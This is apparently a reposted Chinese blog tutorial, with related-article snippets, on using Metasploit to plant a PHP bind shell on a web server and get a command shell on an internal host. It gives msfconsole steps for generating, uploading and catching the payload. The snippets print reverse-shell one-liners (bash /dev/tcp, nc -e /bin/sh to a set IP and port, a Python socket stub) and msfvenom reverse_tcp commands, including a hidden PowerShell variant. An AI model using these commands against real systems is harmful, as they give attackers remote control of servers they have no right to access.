php结合msf反弹内网shell

最新推荐文章于 2024-05-30 22:07:23 发布
最新推荐文章于 2024-05-30 22:07:23 发布
阅读量645 收藏 1
点赞数
文章标签: php shell 数据库
原文链接:http://www.cnblogs.com/xishaonian/p/7192497.html
版权

感谢:

perl6大佬分享的姿势。

MSF:

msf > use payload/php/bind_php
msf exploit(handler) > set PAYLOAD payload/php/bind_php
msf exploit(handler) > set RHOST 目标内网ip
msf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之后就会在f盘生成xishaonian.php脚本一般都是需要修改一下,没有php标签就加个php标签之类的。

然后将xishaonian.php传到web上。
然后再次运行msf

use payload/php/bind_php
msf payload(bind_php) > set RHOST 目标外网ip
msf payload(bind_php) > use exploit/multi/handler
msf exploit(handler) > set payload php/bind_php
msf exploit(handler) > run

访问web上的xishaonian.php,就可以反弹到cmdshell了。

转载于:https://www.cnblogs.com/xishaonian/p/7192497.html

aiquan9342
关注
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 719
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4712
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
msf反弹php shell,msf构造出shell反弹脚本
weixin_39669769的博客
03-22 789
Liunx下能够构造shell反弹脚本有很多常见的如bash,netcat、socat以及各种语言,当然今天主要内容是详细介绍msfvenom如何生成shell脚本。正文metasploit-framework介绍Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。Metasploit项目...
msf反弹php shell,msf反弹shell - osc_u4ki5b6h的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_34230075的博客
03-22 421
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗反弹shell的两种方法 第一种Msfvenom实例:1、msfconsole    #启动msf2、msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php    #生成反弹shell文件LHOST表示本地攻击机的ip,LPO...
msf生成php反弹,反弹shell总结
weixin_29967445的博客
04-13 1464
1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&12.nc反弹nc -e /bin/sh 192.168.2.130 44443.pythonimport socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "1...
msf渗透练习-php后门反弹
weixin_49349476的博客
06-09 2717
php后门反弹,就是通过php的后门文件,对目标进行操控。本次使用msf完成(仅供学习)
msf反弹php shell,msf实现linux shell反弹
weixin_42488997的博客
03-22 746
运行环境:kali ip:192.168.123.90Linux ip:192.168.123.5Linux服务器上开有80端口,并且有上传话不多说,上传一句话,菜刀连接。然后打开kali 并启动msf进入> use exploit/multi/handler设置 payload> set payload php/metrpreter/reverse_tcp...
内网转发——反弹shell
cxrpty的博客
03-16 1121
内网转发的目的: 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 代理方式: 正向代理:正向代理是服务器开放端口,客户端主动访问服务器的端口。正向代理的过程是它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。 反向代理:反向代理是客户端开发端口,服务器连接客户端。反向代理是相对于服务...
反弹shell原理与实现
悦分享
08-02 3356
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
红队内网攻防渗透:内网渗透之windows内网权限提升技术:哥斯拉&MSF&CS
最新发布
HACKONE的博客
05-30 487
虚拟化:Docker,ESXi,QEMU,Hyper-V等。jsp由于机制的原因不需要提权,一般拿到的权限就是最高权限。目前的msf版本有bug可以TB上购买pro版本嘎嘎稳。集成软件:宝塔,PhpStudy,XAMMP等。ASP/ASP.NET/PHP/JSP等。全自动:快速识别系统中可能被利用的漏洞。自行搭建:自己一个个下载安装搭建配置。集成软件,自行搭建,虚拟化等。执行不了命令,所以需要提权。
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
msf监听php反弹shell,使用msf进行反弹shell+内网渗透
weixin_39777242的博客
03-16 1722
首先说明一点,反弹shell的前提是该主机可以执行咱们的恶意命令反弹shell的原理与灰鸽子的原理是类似的,就是在靶机上执行一个咱们msf精心构造的客户端,使靶机主动回连咱们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。1、反弹shell:1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令以下:“msfvenom -...
msf反弹shell内网渗透
OKAY_TC的博客
10-16 1886
用法示例: 1. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<本机ip地址> lport=<本机监听端口> -f psh-reflection -o xx.ps1 //生成文件放在目标机目录下 //powershell执行脚本:powershell -windowstyle hidden -e...
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 7096
生成木马进行植入
利用metasploit生成反弹shell程序,实现远程控制
qq_33163046的博客
08-20 3992
Metasploit生成反弹shell实现远程控制的方法具有高度定制化、多平台支持、强大的漏洞利用能力、无需事先安装恶意软件以及高度灵活和可扩展等优点。这使得用户能够根据具体需求和目标系统的特点,实现精确、有效和隐蔽的远程控制。
反弹shell的N种姿势
yyj1781572的博客
08-06 650
在渗透测试过程中,经常会用到反弹shell,通过本实验的学习,了解反弹shell的概念和原理,掌握各种反弹shell的实现技术和方法。
msf反弹php shell,反弹shell总结
weixin_42502419的博客
03-22 497
1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&12.nc反弹nc -e /bin/sh 192.168.2.130 44443.pythonimport socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "1...
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3291
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
msf反弹shell
cj_Hydra's Blog
02-01 1491
windows+exe反弹 使用msfvenom模块生成一个被控端的客户端文件,这里用windows 64为例(如果不加x64,则默认是32位),此时就会生成一个shell.exe的程序。 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=攻击机ip地址 lport=监听端口 -f exe >shell.exe 在攻击机的m...
msf php反弹shell
05-26
要使用 Metasploit 的 PHP 反弹 shell,可以按照以下步骤进行: 1. 首先启动 Metasploit 控制台,使用以下命令: ``` msfconsole ``` 2. 然后搜索 php 反弹 shell 的模块,使用以下命令: ``` search type:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值